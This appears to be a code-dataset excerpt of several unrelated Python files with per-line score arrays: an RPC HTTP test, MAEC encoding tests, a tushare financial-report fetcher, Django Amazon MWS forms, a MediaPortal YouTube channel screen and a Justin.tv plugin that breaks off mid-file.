" authpair = urlNode2.username + ':' + urlNode2.password\n", " headers = {\"Authorization\": \"Basic \" + str_to_b64str(authpair)}\n", "\n", " conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)\n", " conn.connect()\n", " conn.request('POST', '/', '{\"method\": \"getbestblockhash\"}', headers)\n", " out1 = conn.getresponse().read()\n", " assert(b'\"error\":null' in out1)\n", " assert(conn.sock!=None) #connection must be closed because machinecoind should use keep-alive by default\n", "\n", " # Check excessive request size\n", " conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)\n", " conn.connect()\n", " conn.request('GET', '/' + ('x'*1000), '', headers)\n", " out1 = conn.getresponse()\n", " assert_equal(out1.status, http.client.NOT_FOUND)\n", "\n", " conn = http.client.HTTPConnection(urlNode2.hostname, urlNode2.port)\n", " conn.connect()\n", " conn.request('GET', '/' + ('x'*10000), '', headers)\n", " out1 = conn.getresponse()\n", " assert_equal(out1.status, http.client.BAD_REQUEST)\n", "\n", "\n", "if __name__ == '__main__':\n", " HTTPBasicsTest ().main ()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02040816326530612, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05813953488372093, 0, 0.018867924528301886, 0, 0, 0.03260869565217391, 0.05813953488372093, 0, 0, 0.022988505747126436, 0.01, 0, 0, 0, 0, 0, 0, 0.05813953488372093, 0, 0.018867924528301886, 0, 0, 0.03260869565217391, 0.05813953488372093, 0, 0, 0.02, 0.02127659574468085, 0, 0, 0, 0, 0, 0, 0.05813953488372093, 0, 0.014492753623188406, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.019230769230769232, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04424778761061947, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.06666666666666667 ]
108
0.005861
false
# -*- coding: utf-8 -*- # Copyright (c) 2018, The MITRE Corporation. All rights reserved. # See LICENSE.txt for complete terms. """Tests for various encoding issues throughout the library""" import unittest from mixbox import binding_utils from mixbox.vendor.six import text_type from maec.package.malware_subject import MalwareConfigurationParameter from maec.package.analysis import DynamicAnalysisMetadata from maec.package.grouping_relationship import GroupingRelationship from maec.bundle.bundle import Bundle from maec.bundle.av_classification import AVClassification from maec.bundle.behavior import Behavior from maec.bundle.capability import Capability import maec.utils from cybox.test import round_trip UNICODE_STR = u"❤ ♎ ☀ ★ ☂ ♞ ☯ ☭ ☢ €☎⚑ ❄♫✂" class EncodingTests(unittest.TestCase): @classmethod def setUpClass(cls): cls.orig_encoding = binding_utils.ExternalEncoding binding_utils.ExternalEncoding = 'utf-16' @classmethod def tearDownClass(cls): binding_utils.ExternalEncoding = cls.orig_encoding def test_malware_configuration_parameter(self): config = MalwareConfigurationParameter() config.value = UNICODE_STR config2 = round_trip(config) self.assertEqual(config.value, config2.value) def test_dynamic_analysis_metadata(self): metadata = DynamicAnalysisMetadata() metadata.command_line = UNICODE_STR metadata2 = round_trip(metadata) self.assertEqual(metadata.command_line, metadata2.command_line) def test_grouping_relationship(self): relationship = GroupingRelationship() relationship.malware_family_name = UNICODE_STR relationship.malware_toolkit_name = UNICODE_STR relationship2 = round_trip(relationship) self.assertEqual(relationship.malware_family_name, relationship2.malware_family_name) self.assertEqual(relationship.malware_toolkit_name, relationship2.malware_toolkit_name) def test_behavior(self): behavior = Behavior() behavior.description = UNICODE_STR behavior2 = round_trip(behavior) self.assertEqual(behavior.description, behavior2.description) def 
test_capability(self): capability = Capability() capability.description = UNICODE_STR capability2 = round_trip(capability) self.assertEqual(capability.description, capability2.description) def test_av_classification(self): av_class = AVClassification() av_class.engine_version = UNICODE_STR av_class.definition_version = UNICODE_STR av_class.classification_name = UNICODE_STR av_class2 = round_trip(av_class) self.assertEqual(av_class.engine_version, av_class2.engine_version) self.assertEqual(av_class.definition_version, av_class2.definition_version) self.assertEqual(av_class.classification_name, av_class2.classification_name) def test_to_xml_utf16_encoded(self): encoding = 'utf-16' b = Behavior() b.description = UNICODE_STR xml = b.to_xml(encoding=encoding) self.assertTrue(UNICODE_STR in xml.decode(encoding)) def test_to_xml_default_encoded(self): b = Behavior() b.description = UNICODE_STR xml = b.to_xml() self.assertTrue(UNICODE_STR in xml.decode('utf-8')) def test_to_xml_no_encoding(self): b = Behavior() b.description = UNICODE_STR xml = b.to_xml(encoding=None) self.assertTrue(isinstance(xml, text_type)) self.assertTrue(UNICODE_STR in xml) if __name__ == "__main__": unittest.main()
[ "# -*- coding: utf-8 -*-\n", "# Copyright (c) 2018, The MITRE Corporation. All rights reserved.\n", "# See LICENSE.txt for complete terms.\n", "\n", "\"\"\"Tests for various encoding issues throughout the library\"\"\"\n", "\n", "import unittest\n", "\n", "from mixbox import binding_utils\n", "from mixbox.vendor.six import text_type\n", "\n", "from maec.package.malware_subject import MalwareConfigurationParameter\n", "from maec.package.analysis import DynamicAnalysisMetadata\n", "from maec.package.grouping_relationship import GroupingRelationship\n", "from maec.bundle.bundle import Bundle\n", "from maec.bundle.av_classification import AVClassification\n", "from maec.bundle.behavior import Behavior\n", "from maec.bundle.capability import Capability\n", "import maec.utils\n", "\n", "from cybox.test import round_trip\n", "\n", "UNICODE_STR = u\"❤ ♎ ☀ ★ ☂ ♞ ☯ ☭ ☢ €☎⚑ ❄♫✂\"\n", "\n", "class EncodingTests(unittest.TestCase):\n", "\n", " @classmethod\n", " def setUpClass(cls):\n", " cls.orig_encoding = binding_utils.ExternalEncoding\n", " binding_utils.ExternalEncoding = 'utf-16'\n", "\n", " @classmethod\n", " def tearDownClass(cls):\n", " binding_utils.ExternalEncoding = cls.orig_encoding\n", "\n", " def test_malware_configuration_parameter(self):\n", " config = MalwareConfigurationParameter()\n", " config.value = UNICODE_STR\n", " config2 = round_trip(config)\n", " self.assertEqual(config.value, config2.value)\n", "\n", " def test_dynamic_analysis_metadata(self):\n", " metadata = DynamicAnalysisMetadata()\n", " metadata.command_line = UNICODE_STR\n", " metadata2 = round_trip(metadata)\n", " self.assertEqual(metadata.command_line, metadata2.command_line)\n", "\n", " def test_grouping_relationship(self):\n", " relationship = GroupingRelationship()\n", " relationship.malware_family_name = UNICODE_STR\n", " relationship.malware_toolkit_name = UNICODE_STR\n", " relationship2 = round_trip(relationship)\n", " self.assertEqual(relationship.malware_family_name, 
relationship2.malware_family_name)\n", " self.assertEqual(relationship.malware_toolkit_name, relationship2.malware_toolkit_name)\n", "\n", " def test_behavior(self):\n", " behavior = Behavior()\n", " behavior.description = UNICODE_STR\n", " behavior2 = round_trip(behavior)\n", " self.assertEqual(behavior.description, behavior2.description)\n", "\n", " def test_capability(self):\n", " capability = Capability()\n", " capability.description = UNICODE_STR\n", " capability2 = round_trip(capability)\n", " self.assertEqual(capability.description, capability2.description)\n", "\n", " def test_av_classification(self):\n", " av_class = AVClassification()\n", " av_class.engine_version = UNICODE_STR\n", " av_class.definition_version = UNICODE_STR\n", " av_class.classification_name = UNICODE_STR\n", " av_class2 = round_trip(av_class)\n", " self.assertEqual(av_class.engine_version, av_class2.engine_version)\n", " self.assertEqual(av_class.definition_version, av_class2.definition_version)\n", " self.assertEqual(av_class.classification_name, av_class2.classification_name)\n", "\n", " def test_to_xml_utf16_encoded(self):\n", " encoding = 'utf-16'\n", " b = Behavior()\n", " b.description = UNICODE_STR\n", " xml = b.to_xml(encoding=encoding)\n", " self.assertTrue(UNICODE_STR in xml.decode(encoding))\n", "\n", " def test_to_xml_default_encoded(self):\n", " b = Behavior()\n", " b.description = UNICODE_STR\n", " xml = b.to_xml()\n", " self.assertTrue(UNICODE_STR in xml.decode('utf-8'))\n", "\n", " def test_to_xml_no_encoding(self):\n", " b = Behavior()\n", " b.description = UNICODE_STR\n", " xml = b.to_xml(encoding=None)\n", " self.assertTrue(isinstance(xml, text_type))\n", " self.assertTrue(UNICODE_STR in xml)\n", "\n", "if __name__ == \"__main__\":\n", " unittest.main()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.025, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.010638297872340425, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0.011627906976744186, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0 ]
99
0.001077
false
import tushare as ts import storage as storage import datetime as datetime import sys import os import sqlalchemy as sqlalchemy def get_year_season(offset): y = datetime.datetime.now().year s = ((datetime.datetime.now().month + 2) // 3) + offset if (s==0): y = y -1 s = 4 return (y,s) def available(year,season): print("valid report data") r = ts.get_report_data(year,season) if r is None: return False return True def save(r, name,year,season): if r is None: return None r['year'] = year r['season'] = season r['ts'] = datetime.datetime.now() storage.save_sql(r,name, mode='append', dtype={'year': sqlalchemy.types.VARCHAR(20), 'season': sqlalchemy.types.VARCHAR(20) }) def get_report_data(year,season): if not available(year, season): return None; print("get_report_data") save(ts.get_report_data(year,season),"basics/report_data",year,season) print("get_profit_data") save(ts.get_profit_data(year,season),"basics/profit_data",year,season) filename = "operation_data" print("get_operation_data") save(ts.get_operation_data(year,season),"basics/operation_data",year,season) filename = "growth_data" print("get_growth_data") save(ts.get_growth_data(year,season),"basics/growth_data",year,season) filename = "get_debtpaying_data" print("get_debtpaying_data") save(ts.get_debtpaying_data(year,season),"basics/debtpaying_data",year,season) filename = "get_debtpaying_data" print("get_cashflow_data") save(ts.get_cashflow_data(year,season),"basics/cashflow_data",year,season) if len(sys.argv) < 2: (year, season) = get_year_season(0) print("get report data for season ",year, "/", season) get_report_data(year, season) else: thisyear = datetime.datetime.now().year year = thisyear + int(sys.argv[1]) for iyear in range(year,thisyear): for iseason in range(1,4): print("get report data for season ",iyear, "/", iseason) get_report_data(iyear, iseason)
[ "import tushare as ts\n", "import storage as storage\n", "import datetime as datetime\n", "import sys\n", "import os\n", "import sqlalchemy as sqlalchemy\n", "\n", "def get_year_season(offset):\n", " y = datetime.datetime.now().year\n", " s = ((datetime.datetime.now().month + 2) // 3) + offset\n", "\n", " if (s==0):\n", " y = y -1\n", " s = 4\n", "\n", " return (y,s)\n", "\n", "def available(year,season):\n", " print(\"valid report data\")\n", " r = ts.get_report_data(year,season)\n", " if r is None:\n", " return False\n", " return True\n", "\n", "def save(r, name,year,season):\n", " if r is None:\n", " return None\n", "\n", " r['year'] = year\n", " r['season'] = season\n", " r['ts'] = datetime.datetime.now()\n", "\n", " storage.save_sql(r,name, mode='append',\n", " dtype={'year': sqlalchemy.types.VARCHAR(20),\n", " 'season': sqlalchemy.types.VARCHAR(20)\n", " })\n", "\n", "def get_report_data(year,season):\n", " if not available(year, season):\n", " return None;\n", "\n", " print(\"get_report_data\")\n", " save(ts.get_report_data(year,season),\"basics/report_data\",year,season)\n", "\n", " print(\"get_profit_data\")\n", " save(ts.get_profit_data(year,season),\"basics/profit_data\",year,season)\n", "\n", " filename = \"operation_data\"\n", " print(\"get_operation_data\")\n", " save(ts.get_operation_data(year,season),\"basics/operation_data\",year,season)\n", "\n", " filename = \"growth_data\"\n", " print(\"get_growth_data\")\n", " save(ts.get_growth_data(year,season),\"basics/growth_data\",year,season)\n", "\n", " filename = \"get_debtpaying_data\"\n", " print(\"get_debtpaying_data\")\n", " save(ts.get_debtpaying_data(year,season),\"basics/debtpaying_data\",year,season)\n", "\n", " filename = \"get_debtpaying_data\"\n", " print(\"get_cashflow_data\")\n", " save(ts.get_cashflow_data(year,season),\"basics/cashflow_data\",year,season)\n", "\n", "if len(sys.argv) < 2:\n", " (year, season) = get_year_season(0)\n", " print(\"get report data for season \",year, \"/\", 
season)\n", " get_report_data(year, season)\n", "else:\n", " thisyear = datetime.datetime.now().year\n", " year = thisyear + int(sys.argv[1])\n", " for iyear in range(year,thisyear):\n", " for iseason in range(1,4):\n", " print(\"get report data for season \",iyear, \"/\", iseason)\n", " get_report_data(iyear, iseason)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0.034482758620689655, 0, 0, 0, 0.06666666666666667, 0.058823529411764705, 0, 0, 0.058823529411764705, 0, 0.07142857142857142, 0, 0.025, 0, 0, 0, 0, 0.0967741935483871, 0, 0, 0, 0, 0, 0, 0, 0.022727272727272728, 0, 0, 0, 0, 0.058823529411764705, 0, 0.047619047619047616, 0, 0, 0.05333333333333334, 0, 0, 0.05333333333333334, 0, 0, 0, 0.06172839506172839, 0, 0, 0, 0.05333333333333334, 0, 0, 0, 0.060240963855421686, 0, 0, 0, 0.05063291139240506, 0, 0.045454545454545456, 0, 0.01694915254237288, 0, 0, 0, 0, 0.02564102564102564, 0.02857142857142857, 0.014492753623188406, 0 ]
74
0.013579
false
from django import forms from django.db.models import get_model from django.utils.translation import ugettext_lazy as _ AmazonMarketplace = get_model('oscar_mws', 'AmazonMarketplace') class MwsProductFeedForm(forms.Form): FEED_CREATE_PRODUCTS = 'submit_product_feed' FEED_SWITCH_TO_AFN = 'switch_to_afn' UPDATE_PRODUCT_IDENTIFIERS = 'update_product_identifiers' UPDATE_STOCK = 'update_stock' FEED_CHOICES = ( (FEED_CREATE_PRODUCTS, _("Create new products")), (FEED_SWITCH_TO_AFN, _("Switch to 'Fulfillment by Amazon'")), (UPDATE_PRODUCT_IDENTIFIERS, _("Update product ASINs")), (UPDATE_STOCK, _("Update product stock")), ) submission_selection = forms.ChoiceField(choices=FEED_CHOICES) marketplace = forms.ModelChoiceField( queryset=AmazonMarketplace.objects.none(), required=True, empty_label=None, label=_("Marketplace"), ) def __init__(self, *args, **kwargs): super(MwsProductFeedForm, self).__init__(*args, **kwargs) self.fields['marketplace'].queryset = AmazonMarketplace.objects.all() class AmazonProfileUpdateForm(forms.ModelForm): class Meta: model = get_model('oscar_mws', 'AmazonProfile') exclude = ('product', 'asin') class AmazonProfileCreateForm(forms.ModelForm): class Meta: model = get_model('oscar_mws', 'AmazonProfile') exclude = ('asin',) def __init__(self, *args, **kwargs): product = kwargs.pop('product') super(AmazonProfileCreateForm, self).__init__(*args, **kwargs) self.fields['product'].initial = product self.fields['product'].widget = forms.HiddenInput()
[ "from django import forms\n", "from django.db.models import get_model\n", "from django.utils.translation import ugettext_lazy as _\n", "\n", "AmazonMarketplace = get_model('oscar_mws', 'AmazonMarketplace')\n", "\n", "\n", "class MwsProductFeedForm(forms.Form):\n", " FEED_CREATE_PRODUCTS = 'submit_product_feed'\n", " FEED_SWITCH_TO_AFN = 'switch_to_afn'\n", " UPDATE_PRODUCT_IDENTIFIERS = 'update_product_identifiers'\n", " UPDATE_STOCK = 'update_stock'\n", " FEED_CHOICES = (\n", " (FEED_CREATE_PRODUCTS, _(\"Create new products\")),\n", " (FEED_SWITCH_TO_AFN, _(\"Switch to 'Fulfillment by Amazon'\")),\n", " (UPDATE_PRODUCT_IDENTIFIERS, _(\"Update product ASINs\")),\n", " (UPDATE_STOCK, _(\"Update product stock\")),\n", " )\n", " submission_selection = forms.ChoiceField(choices=FEED_CHOICES)\n", " marketplace = forms.ModelChoiceField(\n", " queryset=AmazonMarketplace.objects.none(),\n", " required=True,\n", " empty_label=None,\n", " label=_(\"Marketplace\"),\n", " )\n", "\n", " def __init__(self, *args, **kwargs):\n", " super(MwsProductFeedForm, self).__init__(*args, **kwargs)\n", " self.fields['marketplace'].queryset = AmazonMarketplace.objects.all()\n", "\n", "\n", "class AmazonProfileUpdateForm(forms.ModelForm):\n", " class Meta:\n", " model = get_model('oscar_mws', 'AmazonProfile')\n", " exclude = ('product', 'asin')\n", "\n", "\n", "class AmazonProfileCreateForm(forms.ModelForm):\n", " class Meta:\n", " model = get_model('oscar_mws', 'AmazonProfile')\n", " exclude = ('asin',)\n", "\n", " def __init__(self, *args, **kwargs):\n", " product = kwargs.pop('product')\n", " super(AmazonProfileCreateForm, self).__init__(*args, **kwargs)\n", " self.fields['product'].initial = product\n", " self.fields['product'].widget = forms.HiddenInput()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
47
0
false
# -*- coding: utf-8 -*- from os.path import exists from Plugins.Extensions.MediaPortal.plugin import _ from Plugins.Extensions.MediaPortal.resources.imports import * from Plugins.Extensions.MediaPortal.additions.mediatheken.youtube import YT_ListScreen default_cover = "file://%s/youtube.png" % (config.mediaportal.iconcachepath.value + "logos") class show_USER_Genre(MPScreen): def __init__(self, session): MPScreen.__init__(self, session, skin='MP_Plugin') self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel, "green" : self.keyGreen }, -1) self['title'] = Label("YouTube") self['ContentTitle'] = Label(_("User Channels")) self['name'] = Label(_("Selection:")) self['F1'] = Label(_("Exit")) self['F2'] = Label(_("Load")) self.user_path = config.mediaportal.watchlistpath.value + "mp_userchan.xml" self.show_help = config.mediaportal.show_userchan_help.value self.keyLocked = True self.genreliste = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.onLayoutFinish.append(self.layoutFinished) def layoutFinished(self): CoverHelper(self['coverArt']).getCover(default_cover) if not exists(self.user_path): self.getUserFile(fInit=True) if self.show_help: self.genreliste.append((_("With this extension you can add your favorite YouTube channels themselves."), "")) self.genreliste.append(("", "")) self.genreliste.append((_("For each channel, only two entries are added:"), "")) self.genreliste.append((_("'<name> channel name </name>' and '<user> owner name </user>'"), "")) self.genreliste.append(("", "")) self.genreliste.append((_("With the 'Green' button the user file:"), "")) self.genreliste.append((_("'%s' is loaded.") % self.user_path, "")) self.ml.setList(map(self._defaultlistcenter, self.genreliste)) else: self.getUserFile() def getUserFile(self, fInit=False): fname = mp_globals.pluginPath + "/userfiles/userchan.xml" try: if fInit: shutil.copyfile(fname, 
self.user_path) return fp = open(self.user_path) data = fp.read() fp.close() except IOError, e: self.genreliste = [] self.genreliste.append((str(e), "")) self.ml.setList(map(self._defaultlistcenter, self.genreliste)) else: list = re.findall('<name>(.*?)</name>.*?<user>(.*?)</user>', data, re.S) self.genreliste = [] if list: for (name, user) in list: self.genreliste.append((name.strip(), '/'+user.strip())) self.keyLocked = False else: self.genreliste.append((_("No channels found!"), "")) self.ml.setList(map(self._defaultlistcenter, self.genreliste)) def keyGreen(self): self.getUserFile() def keyOK(self): if self.keyLocked: return genre = self['liste'].getCurrent()[0][0] stvLink = self['liste'].getCurrent()[0][1] if stvLink == '/': return url = "gdata.youtube.com/feeds/api/users"+stvLink+"/uploads?" self.session.open(YT_ListScreen, url, genre, title="YouTube")
[ "# -*- coding: utf-8 -*-\n", "from os.path import exists\n", "from Plugins.Extensions.MediaPortal.plugin import _\n", "from Plugins.Extensions.MediaPortal.resources.imports import *\n", "from Plugins.Extensions.MediaPortal.additions.mediatheken.youtube import YT_ListScreen\n", "default_cover = \"file://%s/youtube.png\" % (config.mediaportal.iconcachepath.value + \"logos\")\n", "\n", "class show_USER_Genre(MPScreen):\n", "\n", "\tdef __init__(self, session):\n", "\n", "\t\tMPScreen.__init__(self, session, skin='MP_Plugin')\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\"\t: self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel,\n", "\t\t\t\"green\"\t: self.keyGreen\n", "\t\t}, -1)\n", "\n", "\t\tself['title'] = Label(\"YouTube\")\n", "\t\tself['ContentTitle'] = Label(_(\"User Channels\"))\n", "\t\tself['name'] = Label(_(\"Selection:\"))\n", "\t\tself['F1'] = Label(_(\"Exit\"))\n", "\t\tself['F2'] = Label(_(\"Load\"))\n", "\n", "\t\tself.user_path = config.mediaportal.watchlistpath.value + \"mp_userchan.xml\"\n", "\t\tself.show_help = config.mediaportal.show_userchan_help.value\n", "\t\tself.keyLocked = True\n", "\t\tself.genreliste = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.onLayoutFinish.append(self.layoutFinished)\n", "\n", "\tdef layoutFinished(self):\n", "\t\tCoverHelper(self['coverArt']).getCover(default_cover)\n", "\t\tif not exists(self.user_path):\n", "\t\t\tself.getUserFile(fInit=True)\n", "\n", "\t\tif self.show_help:\n", "\t\t\tself.genreliste.append((_(\"With this extension you can add your favorite YouTube channels themselves.\"), \"\"))\n", "\t\t\tself.genreliste.append((\"\", \"\"))\n", "\t\t\tself.genreliste.append((_(\"For each channel, only two entries are added:\"), \"\"))\n", "\t\t\tself.genreliste.append((_(\"'<name> channel name </name>' and '<user> owner name </user>'\"), 
\"\"))\n", "\t\t\tself.genreliste.append((\"\", \"\"))\n", "\t\t\tself.genreliste.append((_(\"With the 'Green' button the user file:\"), \"\"))\n", "\t\t\tself.genreliste.append((_(\"'%s' is loaded.\") % self.user_path, \"\"))\n", "\t\t\tself.ml.setList(map(self._defaultlistcenter, self.genreliste))\n", "\t\telse:\n", "\t\t\tself.getUserFile()\n", "\n", "\tdef getUserFile(self, fInit=False):\n", "\t\tfname = mp_globals.pluginPath + \"/userfiles/userchan.xml\"\n", "\t\ttry:\n", "\t\t\tif fInit:\n", "\t\t\t\tshutil.copyfile(fname, self.user_path)\n", "\t\t\t\treturn\n", "\t\t\tfp = open(self.user_path)\n", "\t\t\tdata = fp.read()\n", "\t\t\tfp.close()\n", "\t\texcept IOError, e:\n", "\t\t\tself.genreliste = []\n", "\t\t\tself.genreliste.append((str(e), \"\"))\n", "\t\t\tself.ml.setList(map(self._defaultlistcenter, self.genreliste))\n", "\t\telse:\n", "\t\t\tlist = re.findall('<name>(.*?)</name>.*?<user>(.*?)</user>', data, re.S)\n", "\t\t\tself.genreliste = []\n", "\t\t\tif list:\n", "\t\t\t\tfor (name, user) in list:\n", "\t\t\t\t\tself.genreliste.append((name.strip(), '/'+user.strip()))\n", "\t\t\t\tself.keyLocked = False\n", "\t\t\telse:\n", "\t\t\t\tself.genreliste.append((_(\"No channels found!\"), \"\"))\n", "\t\t\tself.ml.setList(map(self._defaultlistcenter, self.genreliste))\n", "\n", "\tdef keyGreen(self):\n", "\t\tself.getUserFile()\n", "\n", "\tdef keyOK(self):\n", "\t\tif self.keyLocked:\n", "\t\t\treturn\n", "\n", "\t\tgenre = self['liste'].getCurrent()[0][0]\n", "\t\tstvLink = self['liste'].getCurrent()[0][1]\n", "\t\tif stvLink == '/':\n", "\t\t\treturn\n", "\t\turl = \"gdata.youtube.com/feeds/api/users\"+stvLink+\"/uploads?\"\n", "\t\tself.session.open(YT_ListScreen, url, genre, title=\"YouTube\")" ]
[ 0, 0, 0, 0, 0.011494252873563218, 0.010752688172043012, 0, 0.030303030303030304, 0, 0.03333333333333333, 0, 0.018867924528301886, 0, 0.020833333333333332, 0.08333333333333333, 0.08, 0.034482758620689655, 0.07407407407407407, 0.1111111111111111, 0, 0.02857142857142857, 0.0196078431372549, 0.025, 0.03125, 0.03125, 0, 0.01282051282051282, 0.015873015873015872, 0.041666666666666664, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.02, 0, 0.037037037037037035, 0.017857142857142856, 0.030303030303030304, 0.03125, 0, 0.047619047619047616, 0.017699115044247787, 0.027777777777777776, 0.023809523809523808, 0.02, 0.027777777777777776, 0.012987012987012988, 0.014084507042253521, 0.015151515151515152, 0.125, 0.045454545454545456, 0, 0.02702702702702703, 0.016666666666666666, 0.14285714285714285, 0.07692307692307693, 0.023255813953488372, 0.09090909090909091, 0.034482758620689655, 0.05, 0.07142857142857142, 0.047619047619047616, 0.041666666666666664, 0.025, 0.015151515151515152, 0.125, 0.013157894736842105, 0.041666666666666664, 0.08333333333333333, 0.03333333333333333, 0.016129032258064516, 0.037037037037037035, 0.1111111111111111, 0.017241379310344827, 0.015151515151515152, 0, 0.047619047619047616, 0.047619047619047616, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0, 0.023255813953488372, 0.022222222222222223, 0.047619047619047616, 0.1, 0.015625, 0.031746031746031744 ]
89
0.034036
false
# -*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta - XBMC Plugin # Canal para justin.tv by Bandavi # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/ #------------------------------------------------------------ import urlparse,urllib2,urllib,re import os, sys import xbmc,xbmcgui,xbmcplugin from core import logger from core import config from core import scrapertools from core.item import Item from servers import servertools from platformcode.xbmc import xbmctools try: import json except: import simplejson as json __channel__ = "justintv" __category__ = "G" __type__ = "generic" __title__ = "Justin.tv" __language__ = "" __creationdate__ = "20111128" DEBUG = config.get_setting("debug") pluginhandle = int(sys.argv[1]) IMAGES_PATH = xbmc.translatePath( os.path.join( config.get_runtime_path(), 'resources' , 'images' , 'posters' ) ) fanart = xbmc.translatePath(os.path.join( config.get_runtime_path(), 'resources' , 'images' ,'fanart','justintv.png')) if config.get_setting("thumbnail_type")=="0": WEB_PATH = "http://pelisalacarta.mimediacenter.info/posters/" else: WEB_PATH = "http://pelisalacarta.mimediacenter.info/banners/" jtv_icon = WEB_PATH+"justintv.png" all = config.get_localized_string(30419) languages = [all,'Arabic','Català','Cerky','Dansk','Deutsch','Greek','English','Español','Eusti Keel','suomi','Francais', 'Hindi' ,'Hrvatski','bahasa Indonesia','Italiano','Hebrew','Japanese','Korean','Lietuviu','Nederlands', 'Norsk','Polski','Portugues','Romana','Russian','Serbian','Svenska','Talagog','Turkey','Tieng Viet', 'Chinese','Taiwanese'] abbrev = ['all','ar','ca','cs','da','de','el','en','es','et','fi','fr','hi','hr','id','it','iw','ja','ko','lt','nl','no','pl','pt', 'ro','ru','sr','sv','tl','tr','vi','zh-CN','zh-TW'] limit = 50 URL_CATEGORY_MENU = 'http://%s.justin.tv/directory/dropmenu/category?lang=%s&amp;order=hot' URL_SUBCATEGORY_MENU = 
'http://%s.justin.tv/directory/dropmenu/subcategory/%s?order=hot&amp;lang=%s' MenuLang = {'English':'en','Spanish':'es','Italian':'it','Catalan':'ca','French':'fr','Portuguese':'pt','German':'de'} try: language_menu = MenuLang[xbmc.getLanguage()] except: language_menu = 'en' def isGeneric(): return True def mainlist(item): logger.info("[justintv.py] mainlist") itemlist = [] try: lang = config.get_setting('justin_lang') if "," in lang: langs = lang.split(",") lang = '' for i in langs: idx = abbrev.index(i) if len(lang)>0: lang = lang + "," + languages[idx] else: lang = languages[idx] else: idx = abbrev.index(lang) lang = languages[idx] except: lang = 'all' idx = abbrev.index(lang) lang = languages[idx] itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30420) + ' (%s)' %lang, action="_language" ,url = "", thumbnail =WEB_PATH+ "language.jpg",fanart = fanart, folder = False)) itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30414), action="listcategory" ,url = "true", thumbnail='http://www-cdn.jtvnw.net/images/redesign/fp_vector_camera.png',fanart = fanart)) itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30413), action="listcategory" ,url = "false", thumbnail='',fanart = fanart)) return itemlist def listcategory(item): itemlist = [] config.set_setting("streamlive",item.url) listcat = getlistcategory() if item.url=='false': title = config.get_localized_string(30408) else: title = '' itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30416)+title, action="favorites" ,url = "", thumbnail=WEB_PATH+ "favoritos.png",fanart = fanart)) itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30415), action="getplayByID" ,url = "", thumbnail="http://thecustomizewindows.com/wp-content/uploads/2011/12/Best-Keyboard-Apps.png",fanart = fanart)) itemlist.append( Item(channel=__channel__, title=config.get_localized_string(30417), action="search" ,url = 
"", thumbnail=WEB_PATH+"buscador.png",fanart = fanart)) for category in listcat: itemlist.append( Item(channel=__channel__, title=scrapertools.unescape(category[1]), action="subCategories" ,url = category[0], thumbnail="http://www-cdn.jtvnw.net/images/category_icons/%s.png" %category[0],fanart = fanart)) return itemlist def getlistcategory(): data = scrapertools.cache_page(URL_CATEGORY_MENU %(language_menu,language_menu)) patron = '<li class="category"><a href="/directory/([^\?]+)\?.+?">(.+?)</a></li>' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) list = [] for match in matches: list.append([match[0],match[1]]) return list def search(item,texto): texto = texto.replace(' ','+') item.title = 'search' item.url = url = 'http://api.justin.tv/api/stream/search/'+texto+'.json?offset=0&limit='+str(limit) itemlist = getlistchannel(item) if config.get_setting('streamlive')=='true': xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true') else: return itemlist def getplayByID(item): logger.info("[justintv.py] plyByID") tecleado = "" default = "" itemlist = [] tecleado = teclado(heading=config.get_localized_string(30405)) if len(tecleado)>0: item.url = 'http://api.justin.tv/api/stream/list.json?channel='+tecleado itemlist = getlistchannel(item) if len(itemlist)>0: if config.get_setting('streamlive') == 'true': xbmctools.renderItems(itemlist, [], '', 'Movies',isPlayable='true') else: return itemlist elif config.get_setting('streamlive') != 'true': xbmc.executebuiltin("XBMC.Notification(Justin tv,Streaming no encontrado... 
